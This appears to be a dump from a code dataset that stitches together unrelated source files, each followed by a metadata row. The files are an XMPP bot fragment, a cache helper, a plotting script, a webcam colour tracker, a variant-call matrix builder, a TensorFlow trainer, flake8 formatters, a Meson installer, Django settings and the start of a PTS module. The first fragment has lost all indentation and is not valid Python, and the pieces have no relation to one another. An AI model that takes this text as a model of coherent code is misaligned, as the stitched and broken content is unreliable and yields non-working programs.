ver_queue[str(iq_id)]=[replyto, msg.getFrom().getResource(), False]
conn.send(req)
globals()['iq_id']+=1
def pingcmd(conn, msg, args, replyto):
if args=="":
target=msg.getFrom()
else:
target=("%s/%s"%(replyto, args))
req=xmpp.protocol.Iq('get', xmpp.NS_VERSION, {}, target)
req.setID(iq_id)
ver_queue[str(iq_id)]=[replyto, msg.getFrom().getResource(), time.time()]
conn.send(req)
globals()['iq_id']+=1
def timecmd(conn, msg, args, replyto):
if args=="":
target=msg.getFrom()
else:
target=("%s/%s"%(replyto, args))
req=xmpp.protocol.Iq('get', xmpp.NS_TIME, {}, target)
req.setID(iq_id)
time_queue[str(iq_id)]=[replyto, msg.getFrom().getResource()]
conn.send(req)
globals()['iq_id']+=1
def versionCB(conn, iq_obj):
uname=os.popen("uname -sr", 'r')
osver=uname.read().strip()
uname.close()
pipe = os.popen('sh -c ' + '"' + 'python -V 2>&1' + '"')
python_ver = pipe.read(1024).strip()
osver = osver + ' ' + python_ver
iq_obj=iq_obj.buildReply('result')
qp=iq_obj.getTag('query')
qp.setTagData('name', vername)
qp.setTagData('version', version)
qp.setTagData('os', osver)
conn.send(iq_obj)
raise xmpp.NodeProcessed
def versionresultCB(conn, iq_obj):
qp=iq_obj.getTag('query')
rname=qp.getTagData('name')
rversion=qp.getTagData('version')
ros=qp.getTagData('os')
rid=iq_obj.getID()
if ver_queue.has_key(rid):
if ver_queue[rid][2]:
if ver_queue[rid][1]==iq_obj.getFrom().getResource():
conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['yourping']%(ver_queue[rid][1], str(round(time.time()-ver_queue[rid][2],3))), 'groupchat'))
else:
conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['ping']%(ver_queue[rid][1], iq_obj.getFrom().getResource(), str(round(time.time()-ver_queue[rid][2],3))), 'groupchat'))
else:
if ver_queue[rid][1]==iq_obj.getFrom().getResource():
conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['yourversion']%(ver_queue[rid][1], rname, rversion, ros), 'groupchat'))
else:
conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['version']%(ver_queue[rid][1], iq_obj.getFrom().getResource(), rname, rversion, ros), 'groupchat'))
def versionerrorCB(conn, iq_obj):
rid=iq_obj.getID()
if ver_queue.has_key(rid):
if ver_queue[rid][2]:
conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['ping_error']%(ver_queue[rid][1], iq_obj.getFrom().getResource()), 'groupchat'))
else:
conn.send(xmpp.protocol.Message(ver_queue[rid][0], messages['version_error']%(ver_queue[rid][1], iq_obj.getFrom().getResource()), 'groupchat'))
def timeCB(conn, iq_obj):
timep=os.popen("date -u '+%Y%m%dT%T'", 'r'); futc=timep.read(17); timep.close()
timep=os.popen("date '+%Z|%d/%m/%Y %T|'", 'r'); ftime=timep.read(); timep.close()
iq_obj = iq_obj.buildReply('result')
qp = iq_obj.getTag('query')
qp.setTagData('utc', futc)
qp.setTagData('tz', ftime.split("|")[0])
qp.setTagData('display', ftime.split("|")[1])
conn.send(iq_obj)
raise xmpp.NodeProcessed
def timeresultCB(conn, iq_obj):
qp=iq_obj.getTag('query')
rdisplay=qp.getTagData('display')
rid=iq_obj.getID()
if time_queue.has_key(rid):
if time_queue[rid][1]==iq_obj.getFrom().getResource():
conn.send(xmpp.protocol.Message(time_queue[rid][0], messages['yourtime']%(time_queue[rid][1], rdisplay), 'groupchat'))
else:
conn.send(xmpp.protocol.Message(time_queue[rid][0], messages['time']%(time_queue[rid][1], iq_obj.getFrom().getResource(), rdisplay), 'groupchat'))
def timeerrorCB(conn, iq_obj):
rid=iq_obj.getID()
if time_queue.has_key(rid):
conn.send(xmpp.protocol.Message(time_queue[rid][0], messages['time_error']%(time_queue[rid][1], iq_obj.getFrom().getResource()), 'groupchat'))
| gpl-2.0 | -6,113,828,099,328,659,000 | 39.271186 | 195 | 0.62016 | false | 2.915337 | false | false | false |
smurfix/pybble | pybble/cache/__init__.py | 1 | 1978 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This is part of Pybble, a WMS (Whatever Management System) based on
## Jinja2/Haml, Werkzeug, Flask, and Optimism.
##
## Pybble is Copyright © 2009-2014 by Matthias Urlichs <[email protected]>,
## it is licensed under the GPLv3. See the file `README.md` for details,
## including an optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
regions = None
from dogpile.cache.api import NO_VALUE
def keystr(args):
# Take care to keep this idempotent: keystr(x) == keystr(keystr(x))
return '|'.join(str(x) for x in args)
## TODO: add keyword-only region param
def delete(*args):
"""Delete a cache value (or a bunch of them)."""
global regions
if regions is None:
from .config import regions
if not regions:
return
# TODO: this only works with redis
r = regions['default'].backend.client
n = 0
if "*" in args:
for k in r.keys(keystr(args)):
r.delete(k)
n += 1
else:
r.delete(keystr(args))
n = 1
return n
def get(*args):
"""Get a cache value, or NO_VALUE if not set."""
global regions
if regions is None:
from .config import regions
if not regions:
return NO_VALUE
r = regions['default']
return r.get(keystr(args))
def set(val, *args):
"""Set a cache value. You really should use cached() instead."""
global regions
if regions is None:
from .config import regions
if not regions:
return
r = regions['default']
r.set(keystr(args),val)
def cached(func, *args):
"""Cache this function's result. Runs the function exactly once."""
global regions
if regions is None:
from .config import regions
if not regions:
return func()
r = regions['default']
return r.get_or_create(keystr(args), func)
| gpl-3.0 | 7,012,280,615,499,374,000 | 24.960526 | 82 | 0.695895 | false | 3.116904 | false | false | false |
natj/bender | paper/figs/fig9.py | 1 | 4141 | import numpy as np
import math
from pylab import *
from palettable.wesanderson import Zissou_5 as wsZ
import matplotlib.ticker as mtick
from scipy.interpolate import interp1d
from scipy.interpolate import griddata
from scipy.signal import savgol_filter
def smooth(xx, yy):
yy = savgol_filter(yy, 7, 2)
np.clip(yy, 0.0, 1000.0, out=yy)
yy[0] = 0.0
yy[-1] = 0.0
return xx, yy
#Read JN files
def read_lineprof(fname):
da = np.genfromtxt(fname, delimiter=",")
des = np.diff(da[:,0])[2]
norm = np.sum(des*da[:,1])
return da[:,0],da[:,1]/norm
#Read JN files
def read_csv(fname):
da = np.genfromtxt(fname, delimiter=",")
des = np.diff(da[:,0])[2]
norm = np.sum(des*da[:,1])
return da[:,0],da[:,1] #/norm
## Plot
fig = figure(figsize=(5,3), dpi=80)
rc('font', family='serif')
rc('xtick', labelsize='xx-small')
rc('ytick', labelsize='xx-small')
gs = GridSpec(1, 1)
#gs.update(wspace = 0.34)
#gs.update(hspace = 0.4)
lsize = 10.0
xmin = 0.69
xmax = 0.82
#error window limits
eymin = -0.5
eymax = 0.5
#path to files
#path_JN = "../../out3/lines/"
path_JN = "../../out/lines2/"
#labels size
tsize = 10.0
nu = '700'
#fig.text(0.5, 0.92, '$\\theta_s = 18^{\\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.72, '$\\theta_s = 45^{\\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.52, '$\\theta_s = 90^{\\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.32, 'Hopf $\\theta_s = 45^{\circ}$', ha='center', va='center', size=tsize)
#fig.text(0.5, 0.12, 'Phase',ha='center', va='center', size=lsize)
ax1 = subplot(gs[0,0])
ax1.minorticks_on()
ax1.set_xlim(xmin, xmax)
ax1.set_ylim(0.0, 30)
ax1.set_ylabel('Normalized flux',size=lsize)
ax1.set_xlabel('Energy $E/E\'$',size=lsize)
#xx1, yy1 = read_lineprof(path_JN+'lineprof_f700pbbr10m1.4i20.csv')
#ax1.plot(xx1, yy1, "k--")
#xx2, yy2 = read_lineprof(path_JN+'lineprof_obl_HTq0_f700pbbr10m1.4i20.csv')
#ax1.plot(xx2, yy2, "k-")
#lineprof_obl_HTq3_f700pbbr10m1.4i20.csv
#lineprof_obl_HTq5_f700pbbr10m1.4i20.csv
#lineprof_obl_HTq2_f700pbbr10m1.4i20.csv
files_JN = [
"lineprof_f700pbbr10m1.4i20.csv",
"lineprof_obl_f700pbbr10m1.4i20.csv",
#"lineprof_sph2_HTqfix_f700pbbr10m1.4i20.csv"]
#"lineprof_obl_HTq0_f700pbbr10m1.4i20.csv",
"lineprof_obl_HTq1_f700pbbr10m1.4i20.csv"]
#"lineprof_obl_HTq4_f700pbbr10m1.4i20.csv"]
files_JN = ['sch/lineprofile_f700_bb_r10_m1.4_i20.csv',
'obl/lineprofile_f700_bb_r10_m1.4_i20.csv',
'q/lineprofile_f700_bb_r10_m1.4_i20.csv']
cols = ["black",
"blue",
"red",
"magenta"]
i = 0
for file_name in files_JN:
xx, yy = read_lineprof(path_JN+file_name)
xx, yy = smooth(xx, yy)
ax1.plot(xx, yy, color=cols[i], linestyle="solid")
i += 1
#path_JN = "../../out3/lines/"
xx, yy = read_lineprof("../../out3/lines/lineprof_obl_HTq4_f700pbbr10m1.4i20.csv")
ax1.plot(xx, yy, color="red", linestyle="dashed")
#files_Bau = [
#"sch+dopp.csv",
#"sch+dopp+obl.csv",
#"HT.csv",
#"HT_obl.csv"]
files_Bau = ['sch.csv', 'obl.csv', 'ht.csv']
i = 0
for file_name in files_Bau:
xx, yy = read_csv(path_JN+file_name)
#rescale xx for correct scaling
#xx = (xx-0.72)/(0.89-0.72)*(0.8-0.72) + 0.72
#ax1.plot(xx, yy, color=cols[i], linestyle="dashed")
i += 1
############ q's
#xx3, yy3 = read_lineprof(path_JN+'lineprof_obl_HTq1_f700pbbr10m1.4i20.csv')
#ax1.plot(xx3, yy3, "k-", label="$q = -0.268$")
#
#xx4, yy4 = read_lineprof(path_JN+'lineprof_obl_HTq2_f700pbbr10m1.4i20.csv')
#ax1.plot(xx4, yy4, "r-", label="$q \\times 2$")
#
#xx5, yy5 = read_lineprof(path_JN+'lineprof_obl_HTq3_f700pbbr10m1.4i20.csv')
#ax1.plot(xx5, yy5, "g-", label="$q \\times 3$")
#
#xx6, yy6 = read_lineprof(path_JN+'lineprof_obl_HTq4_f700pbbr10m1.4i20.csv')
#ax1.plot(xx6, yy6, "b-", label="$q \\times 4$")
#
#xx7, yy7 = read_lineprof(path_JN+'lineprof_obl_HTq5_f700pbbr10m1.4i20.csv')
#ax1.plot(xx7, yy7, "m-", label="$q \\times 5$")
#
#legend = ax1.legend(loc='upper left', shadow=False, labelspacing=0.1)
#for label in legend.get_texts():
# label.set_fontsize('x-small')
savefig('fig9_testi.pdf', bbox_inches='tight')
| mit | 426,456,998,150,507,200 | 23.358824 | 92 | 0.63632 | false | 2.155648 | false | false | false |
gaborvecsei/Color-Tracker | examples/tracking.py | 1 | 2306 | import argparse
from functools import partial
import cv2
import color_tracker
# You can determine these values with the HSVColorRangeDetector()
HSV_LOWER_VALUE = [155, 103, 82]
HSV_UPPER_VALUE = [178, 255, 255]
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument("-low", "--low", nargs=3, type=int, default=HSV_LOWER_VALUE,
help="Lower value for the HSV range. Default = 155, 103, 82")
parser.add_argument("-high", "--high", nargs=3, type=int, default=HSV_UPPER_VALUE,
help="Higher value for the HSV range. Default = 178, 255, 255")
parser.add_argument("-c", "--contour-area", type=float, default=2500,
help="Minimum object contour area. This controls how small objects should be detected. Default = 2500")
parser.add_argument("-v", "--verbose", action="store_true")
args = parser.parse_args()
return args
def tracking_callback(tracker: color_tracker.ColorTracker, verbose: bool = True):
# Visualizing the original frame and the debugger frame
cv2.imshow("original frame", tracker.frame)
cv2.imshow("debug frame", tracker.debug_frame)
# Stop the script when we press ESC
key = cv2.waitKey(1)
if key == 27:
tracker.stop_tracking()
if verbose:
for obj in tracker.tracked_objects:
print("Object {0} center {1}".format(obj.id, obj.last_point))
def main():
args = get_args()
# Creating a kernel for the morphology operations
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (11, 11))
# Init the ColorTracker object
tracker = color_tracker.ColorTracker(max_nb_of_objects=5, max_nb_of_points=20, debug=True)
# Setting a callback which is called at every iteration
callback = partial(tracking_callback, verbose=args.verbose)
tracker.set_tracking_callback(tracking_callback=callback)
# Start tracking with a camera
with color_tracker.WebCamera(video_src=0) as webcam:
# Start the actual tracking of the object
tracker.track(webcam,
hsv_lower_value=args.low,
hsv_upper_value=args.high,
min_contour_area=args.contour_area,
kernel=kernel)
if __name__ == "__main__":
main()
| mit | -4,765,477,397,888,369,000 | 34.476923 | 127 | 0.647008 | false | 3.737439 | false | false | false |
jefftc/changlab | Betsy/Betsy/modules/convert_simplevariantfile_to_matrix.py | 1 | 8224 | from Module import AbstractModule
class Module(AbstractModule):
def __init__(self):
AbstractModule.__init__(self)
def run(
self, network, in_data, out_attributes, user_options, num_cores,
out_filename):
from genomicode import filelib
from genomicode import SimpleVariantMatrix
from genomicode import AnnotationMatrix
simple_file = in_data.identifier
metadata = {}
# Read all in memory. Hopefully, not too big.
ds = []
for d in filelib.read_row(simple_file, header=-1):
ds.append(d)
#if len(ds) > 50000: # DEBUG
# break
# MuSE sometimes has alternates.
# Alt A,C
# Num_Alt 13,0
# VAF 0.19,0.0
# Detect this and fix it. Take the alternate with the highest VAF.
for d in ds:
if d.Num_Alt.find(",") < 0:
continue
x1 = d.Num_Alt.split(",")
x2 = d.VAF.split(",")
assert len(x1) == len(x2)
x1 = map(int, x1)
x2 = map(float, x2)
max_vaf = max_i = None
for i in range(len(x2)):
if max_vaf is None or x2[i] > max_vaf:
max_vaf = x2[i]
max_i = i
assert max_i is not None
d.Num_Alt = str(x1[max_i])
d.VAF = str(x2[max_i])
# Make a list of all the positions.
positions = {} # (Chrom, Pos) -> 1
for d in ds:
positions[(d.Chrom, int(d.Pos))] = 1
positions = sorted(positions)
# Make a list of all the callers.
callers = {}
for d in ds:
callers[d.Caller] = 1
callers = sorted(callers)
# Make a list of all the samples.
samples = {}
for d in ds:
samples[d.Sample] = 1
samples = sorted(samples)
# Make a list of the coordinates.
coord_data = {}
for d in ds:
x = d.Chrom, int(d.Pos), d.Ref, d.Alt
coord_data[x] = 1
coord_data = sorted(coord_data)
# Make a list of all DNA calls.
call_data = []
for d in ds:
assert d.Source in ["DNA", "RNA"]
if d.Source != "DNA":
continue
num_ref = num_alt = vaf = None
if d.Num_Ref:
num_ref = int(d.Num_Ref)
if d.Num_Alt:
num_alt = int(d.Num_Alt)
if d.VAF:
vaf = float(d.VAF)
if num_ref is None and num_alt is None and vaf is None:
continue
call = SimpleVariantMatrix.Call(num_ref, num_alt, vaf)
x = d.Chrom, int(d.Pos), d.Ref, d.Alt, d.Sample, d.Caller, call
call_data.append(x)
# sample -> caller -> chrom, pos, ref, alt -> call
samp2caller2coord2call = {}
for x in call_data:
chrom, pos, ref, alt, sample, caller, call = x
coord = chrom, pos, ref, alt
if sample not in samp2caller2coord2call:
samp2caller2coord2call[sample] = {}
caller2coord2call = samp2caller2coord2call[sample]
if caller not in caller2coord2call:
caller2coord2call[caller] = {}
coord2call = caller2coord2call[caller]
# A (sample, caller, coord) may have multiple calls. For
# example, for germline samples that are called with each
# tumor sample. If this is the case, then take the call
# with the highest coverage.
if coord in coord2call:
old_call = coord2call[coord]
cov = old_cov = None
if call.num_ref is not None and call.num_alt is not None:
cov = call.num_ref + call.num_alt
if old_call.num_ref is not None and \
old_call.num_alt is not None:
old_cov = old_call.num_ref + old_call.num_alt
if cov is None and old_cov is not None:
call = old_call
elif cov is not None and old_cov is not None and cov < old_cov:
call = old_call
coord2call[coord] = call
# Count the number of callers that called a variant at each
# position for each sample.
samp2coord2caller = {} # sample -> chrom, pos, ref, alt -> caller -> 1
# Need to do this first, to make sure each caller is counted
# at most once. This is to account for germline samples that
# is called by each caller multiple times.
for x in call_data:
chrom, pos, ref, alt, sample, caller, call = x
coord = chrom, pos, ref, alt
if sample not in samp2coord2caller:
samp2coord2caller[sample] = {}
if coord not in samp2coord2caller[sample]:
samp2coord2caller[sample][coord] = {}
samp2coord2caller[sample][coord][caller] = 1
samp2coord2nc = {} # sample -> chrom, pos, ref, alt -> num_callers
for sample in samp2coord2caller:
samp2coord2nc[sample] = {}
for coord in samp2coord2caller[sample]:
samp2coord2nc[sample][coord] = len(
samp2coord2caller[sample][coord])
#for x in call_data:
# chrom, pos, ref, alt, sample, caller, call = x
# coord = chrom, pos, ref, alt
# if sample not in samp2coord2nc:
# samp2coord2nc[sample] = {}
# nc = samp2coord2nc[sample].get(coord, 0) + 1
# samp2coord2nc[sample][coord] = nc
# Format everything into an annotation matrix.
headers0 = []
headers1 = []
headers2 = []
all_annots = []
# Add the positions.
headers0 += ["", "", "", ""]
headers1 += ["", "", "", ""]
headers2 += ["Chrom", "Pos", "Ref", "Alt"]
for i in range(4):
x = [x[i] for x in coord_data]
x = [str(x) for x in x]
all_annots.append(x)
# Add the number of callers information.
headers0 += ["Num Callers"] * len(samples)
headers1 += [""] * len(samples)
headers2 += samples
for sample in samples:
annots = []
for coord in coord_data:
nc = samp2coord2nc.get(sample, {}).get(coord, "")
annots.append(nc)
all_annots.append(annots)
# Add information about calls.
for sample in samples:
caller2coord2call = samp2caller2coord2call.get(sample, {})
for i, caller in enumerate(callers):
h0 = ""
if not i:
h0 = sample
h1 = caller
h2 = "Ref/Alt/VAF"
headers0.append(h0)
headers1.append(h1)
headers2.append(h2)
coord2call = caller2coord2call.get(caller, {})
annots = []
for coord in coord_data:
x = ""
call = coord2call.get(coord)
if call:
x = SimpleVariantMatrix._format_call(call)
annots.append(x)
all_annots.append(annots)
# Set the headers.
assert len(headers0) == len(headers1)
assert len(headers0) == len(headers2)
assert len(headers0) == len(all_annots)
headers = [None] * len(headers0)
for i, x in enumerate(zip(headers0, headers1, headers2)):
x = "___".join(x)
headers[i] = x
matrix = AnnotationMatrix.create_from_annotations(headers, all_annots)
SimpleVariantMatrix.write_from_am(out_filename, matrix)
#annot_header = ["Chrom", "Pos", "Ref", "Alt"]
#matrix = SimpleVariantMatrix.make_matrix(
# samples, callers, annot_header, coord_data, named_data,
# call_data)
#SimpleVariantMatrix.write(out_filename, matrix)
return metadata
def name_outfile(self, antecedents, user_options):
return "calls.txt"
| mit | 3,985,949,250,645,467,600 | 36.552511 | 79 | 0.508512 | false | 3.812703 | false | false | false |
dzorlu/sdc-segmentation | train.py | 1 | 4118 | import sys
import tensorflow as tf
from tensorflow.python.ops import math_ops
sys.path.append("slim/")
slim = tf.contrib.slim
TRAIN_DIR = "/tmp/tf"
class Trainer(object):
def __init__(self, nb_classes, optimizer, learning_rate):
self.nb_classes = nb_classes
# learning rate can be a placeholder tensor
self.learning_rate = learning_rate
self.optimizer = optimizer(learning_rate)
self.train_op = None
self.prediction = None
def build(self, predictions, labels, one_hot=False):
with tf.name_scope('training'):
if one_hot:
labels = tf.one_hot(labels, depth=self.nb_classes)
labels = tf.squeeze(labels, axis=2)
label_shape = tf.shape(labels)[:2]
predictions = tf.image.resize_bilinear(predictions, label_shape, name='resize_predictions')
else:
labels = tf.reshape(labels, (-1, self.nb_clasess))
predictions = tf.reshape(predictions, (-1, self.nb_classes))
self.prediction = predictions
labels = tf.expand_dims(labels, 0)
print("pred shape {}, label shape {}".format(predictions.get_shape(), labels.get_shape()))
# wraps the softmax_with_entropy fn. adds it to loss collection
tf.losses.softmax_cross_entropy(logits=predictions, onehot_labels=labels)
# include the regulization losses in the loss collection.
total_loss = tf.losses.get_total_loss()
self.train_op = slim.learning.create_train_op(total_loss,
optimizer=self.optimizer)
def add_summaries(self):
# Add summaries for images, variables and losses.
global_summaries = set([])
# image summary
image_summary = tf.get_default_graph().get_tensor_by_name('IteratorGetNext:0')
image_summary = tf.expand_dims(image_summary, 0)
image_summary = tf.summary.image('image', image_summary)
global_summaries.add(image_summary)
# prediction summary
prediction = tf.argmax(self.prediction, axis=3)
prediction = tf.cast(prediction, tf.float32)
prediction = tf.expand_dims(prediction, 3)
image_summary = tf.summary.image('prediction', prediction)
global_summaries.add(image_summary)
for model_var in slim.get_model_variables():
global_summaries.add(tf.summary.histogram(model_var.op.name, model_var))
# total loss
total_loss_tensor = tf.get_default_graph().get_tensor_by_name('training/total_loss:0')
global_summaries.add(tf.summary.scalar(total_loss_tensor.op.name, total_loss_tensor))
# Merge all summaries together.
summary_op = tf.summary.merge(list(global_summaries), name='summary_op')
return summary_op
def train(self, iterator,
filename,
restore_fn=None,
_add_summaries = True,
number_of_steps=10000,
save_interval_secs = 12000,
same_summaries_secs=120,
keep_checkpoint_every_n_hours=5):
summary_op = None
if _add_summaries:
summary_op = self.add_summaries()
# Save checkpoints regularly.
saver = tf.train.Saver(
keep_checkpoint_every_n_hours=keep_checkpoint_every_n_hours)
# init fn for the dataset ops and checkpointin
def initializer_fn(sess):
input_tensor = tf.get_default_graph().get_tensor_by_name('training_data/input:0')
sess.run(iterator.initializer, feed_dict={input_tensor: filename})
if restore_fn:
restore_fn(sess)
init_fn = initializer_fn
# Soft placement allows placing on CPU ops without GPU implementation.
session_config = tf.ConfigProto(allow_soft_placement=True,
log_device_placement=False)
# train
slim.learning.train(train_op=self.train_op,
logdir=TRAIN_DIR,
session_config=session_config,
summary_op=summary_op,
init_fn=init_fn,
save_interval_secs = save_interval_secs,
number_of_steps=number_of_steps,
save_summaries_secs=same_summaries_secs,
saver=saver)
| mit | 8,798,008,712,275,257,000 | 41.453608 | 99 | 0.639631 | false | 3.830698 | false | false | false |
Aorjoa/aiyara-ceph-dash | .tox/flake8/lib/python2.7/site-packages/flake8/formatting/default.py | 1 | 2191 | """Default formatting class for Flake8."""
from flake8.formatting import base
class SimpleFormatter(base.BaseFormatter):
"""Simple abstraction for Default and Pylint formatter commonality.
Sub-classes of this need to define an ``error_format`` attribute in order
to succeed. The ``format`` method relies on that attribute and expects the
``error_format`` string to use the old-style formatting strings with named
parameters:
* code
* text
* path
* row
* col
"""
error_format = None
def format(self, error):
"""Format and write error out.
If an output filename is specified, write formatted errors to that
file. Otherwise, print the formatted error to standard out.
"""
return self.error_format % {
"code": error.code,
"text": error.text,
"path": error.filename,
"row": error.line_number,
"col": error.column_number,
}
class Default(SimpleFormatter):
"""Default formatter for Flake8.
This also handles backwards compatibility for people specifying a custom
format string.
"""
error_format = '%(path)s:%(row)d:%(col)d: %(code)s %(text)s'
def after_init(self):
"""Check for a custom format string."""
if self.options.format.lower() != 'default':
self.error_format = self.options.format
class Pylint(SimpleFormatter):
"""Pylint formatter for Flake8."""
error_format = '%(path)s:%(row)d: [%(code)s] %(text)s'
class FilenameOnly(SimpleFormatter):
"""Only print filenames, e.g., flake8 -q."""
error_format = '%(path)s'
def after_init(self):
"""Initialize our set of filenames."""
self.filenames_already_printed = set()
def format(self, error):
"""Ensure we only print each error once."""
if error.filename not in self.filenames_already_printed:
self.filenames_already_printed.add(error.filename)
return super(FilenameOnly, self).format(error)
class Nothing(base.BaseFormatter):
"""Print absolutely nothing."""
def format(self, error):
"""Do nothing."""
pass
| bsd-2-clause | -733,534,517,707,735,400 | 26.3875 | 78 | 0.624829 | false | 4.181298 | false | false | false |
WisniewskiP/meson | install_meson.py | 1 | 3639 | #!/usr/bin/env python3
# Copyright 2013-2014 The Meson development team
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This script installs Meson. We can't use Meson to install itself
# because of the bootstrap problem. We can't use any other build system
# either becaust that would be just silly.
import os, sys, glob, shutil, gzip
from optparse import OptionParser
usage_info = '%prog [--prefix PREFIX] [--destdir DESTDIR]'
parser = OptionParser(usage=usage_info)
parser.add_option('--prefix', default='/usr/local', dest='prefix',
help='the installation prefix (default: %default)')
parser.add_option('--destdir', default='', dest='destdir',
help='the destdir (default: %default)')
(options, args) = parser.parse_args(sys.argv)
if options.prefix[0] != '/':
print('Error, prefix must be an absolute path.')
sys.exit(1)
if options.destdir == '':
install_root = options.prefix
else:
install_root = os.path.join(options.destdir, options.prefix[1:])
script_dir = os.path.join(install_root, 'share/meson')
bin_dir = os.path.join(install_root, 'bin')
bin_script = os.path.join(script_dir, 'meson.py')
gui_script = os.path.join(script_dir, 'mesongui.py')
conf_script = os.path.join(script_dir, 'mesonconf.py')
bin_name = os.path.join(bin_dir, 'meson')
gui_name = os.path.join(bin_dir, 'mesongui')
conf_name = os.path.join(bin_dir, 'mesonconf')
man_dir = os.path.join(install_root, 'share/man/man1')
in_manfile = 'man/meson.1'
out_manfile = os.path.join(man_dir, 'meson.1.gz')
in_guimanfile = 'man/mesongui.1'
out_guimanfile = os.path.join(man_dir, 'mesongui.1.gz')
in_confmanfile = 'man/mesonconf.1'
out_confmanfile = os.path.join(man_dir, 'mesonconf.1.gz')
symlink_value = os.path.relpath(bin_script, os.path.dirname(bin_name))
guisymlink_value = os.path.relpath(gui_script, os.path.dirname(gui_name))
confsymlink_value = os.path.relpath(conf_script, os.path.dirname(conf_name))
files = glob.glob('*.py')
files += glob.glob('*.ui')
noinstall = ['compile_meson.py', 'install_meson.py', 'run_tests.py', 'run_cross_test.py']
files = [x for x in files if x not in noinstall]
os.makedirs(script_dir, exist_ok=True)
os.makedirs(bin_dir, exist_ok=True)
os.makedirs(man_dir, exist_ok=True)
for f in files:
print('Installing %s to %s.' %(f, script_dir))
outfilename = os.path.join(script_dir, f)
shutil.copyfile(f, outfilename)
shutil.copystat(f, outfilename)
try:
os.remove(bin_name)
except OSError:
pass
print('Creating symlinks %s and %s.' % (bin_name, gui_name))
try:
os.unlink(bin_name)
except FileNotFoundError:
pass
try:
os.unlink(gui_name)
except FileNotFoundError:
pass
try:
os.unlink(conf_name)
except FileNotFoundError:
pass
os.symlink(symlink_value, bin_name)
os.symlink(guisymlink_value, gui_name)
os.symlink(confsymlink_value, conf_name)
print('Installing manfiles to %s.' % man_dir)
open(out_manfile, 'wb').write(gzip.compress(open(in_manfile, 'rb').read()))
open(out_confmanfile, 'wb').write(gzip.compress(open(in_confmanfile, 'rb').read()))
open(out_guimanfile, 'wb').write(gzip.compress(open(in_guimanfile, 'rb').read()))
| apache-2.0 | -5,287,735,341,432,281,000 | 35.029703 | 89 | 0.710085 | false | 3.004955 | false | false | false |
Gricha/django-empty | django-empty-auth/newproject/settings.py | 1 | 3305 | """
Django settings for newproject project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
from newproject.settings_local import (
SECRET_KEY,
DEBUG,
LESSC_PATH,
USE_SYSLOG,
TEMPLATE_DEBUG,
ALLOWED_HOSTS,
COMPRESS_ENABLED,
DATABASES,
ADMINS)
AUTHENTICATION_BACKENDS = (
'newproject.auth_backends.CustomUserModelBackend',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.debug",
"django.core.context_processors.i18n",
"django.core.context_processors.media",
"django.core.context_processors.static",
"django.core.context_processors.tz",
"django.contrib.messages.context_processors.messages",
'django.core.context_processors.request',)
AUTH_PROFILE_MODULE = 'newproject.apps.account.CustomUser'
CUSTOM_USER_MODEL = 'newproject.apps.account.CustomUser'
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'newproject.apps.account',
'newproject.apps.main',
'compressor',
'south',
'registration',
'widget_tweaks',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'newproject.urls'
WSGI_APPLICATION = 'newproject.wsgi.application'
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static/'),
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder',
)
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
TEMPLATE_DIRS = (
'newproject/templates/',
)
LOGIN_REDIRECT_URL = '/'
COMPRESS_ROOT = os.path.join(BASE_DIR, 'newproject', 'static')
COMPRESS_PRECOMPILERS = (
('text/less', '%s {infile} {outfile}' % LESSC_PATH),
)
| unlicense | 1,989,905,234,812,430,300 | 25.653226 | 75 | 0.722844 | false | 3.482613 | false | false | false |
SKIRT/PTS | magic/region/panda.py | 1 | 4117 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# *****************************************************************
# ** PTS -- Python Toolkit for working with SKIRT **
# ** © Astronomical Observatory, Ghent University **
# *****************************************************************
## \package pts.magic.region.panda Contains the PandaRegion class and subclasses.
